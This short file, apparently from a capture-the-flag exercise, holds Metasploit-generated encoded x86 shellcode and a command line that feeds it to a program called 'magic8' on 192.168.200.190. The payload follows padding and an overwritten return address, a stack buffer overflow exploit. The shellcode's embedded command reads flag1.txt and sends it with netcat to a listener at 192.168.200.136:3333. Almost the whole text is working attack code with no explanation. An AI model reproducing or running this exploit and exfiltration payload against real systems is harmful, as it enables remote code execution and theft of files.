# linux/x86/exec - 106 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, MeterpreterDebugLevel=0, 
# RemoteMeterpreterDebugFile=, CMD=cat flag1.txt| nc -w 3 
# 192.168.200.136 3333
buf = 
"\xda\xcd\xba\xd2\x0c\x1e\x81\xd9\x74\x24\xf4\x5b\x29\xc9" +
"\xb1\x14\x31\x53\x1a\x03\x53\x1a\x83\xc3\x04\xe2\x27\x66" +
"\x15\xd9\x5e\x25\x4f\xb1\x4d\xa9\x06\xa6\xe5\x02\x6a\x41" +
"\xf5\x34\xa3\xf3\x9c\xaa\x32\x10\x0c\xdb\x69\xd7\xb0\x1b" +
"\x11\xb6\xc4\x3b\xb3\x54\x45\x5b\x0a\x8b\xf1\xdb\x18\xaf" +
"\xd9\x75\x82\x6f\x34\xfd\x64\x43\x66\x30\x5c\x91\x48\x03" +
"\xa8\xed\xba\x51\xe4\x3d\xec\xa4\x37\x08\xd0\xf5\x04\x47" +
"\x23\xfa\x3d\xf4\xca\x1b\x0c\x7a"

./magic8 192.168.200.190 "$(python -c 'print "\xda\xcd\xba\xd2\x0c\x1e\x81\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x14\x31\x53\x1a\x03\x53\x1a\x83\xc3\x04\xe2\x27\x66\x15\xd9\x5e\x25\x4f\xb1\x4d\xa9\x06\xa6\xe5\x02\x6a\x41\xf5\x34\xa3\xf3\x9c\xaa\x32\x10\x0c\xdb\x69\xd7\xb0\x1b\x11\xb6\xc4\x3b\xb3\x54\x45\x5b\x0a\x8b\xf1\xdb\x18\xaf\xd9\x75\x82\x6f\x34\xfd\x64\x43\x66\x30\x5c\x91\x48\x03\xa8\xed\xba\x51\xe4\x3d\xec\xa4\x37\x08\xd0\xf5\x04\x47\x23\xfa\x3d\xf4\xca\x1b\x0c\x7a"+"A"*422+"\x9c\x2c\xfe\xff"')"
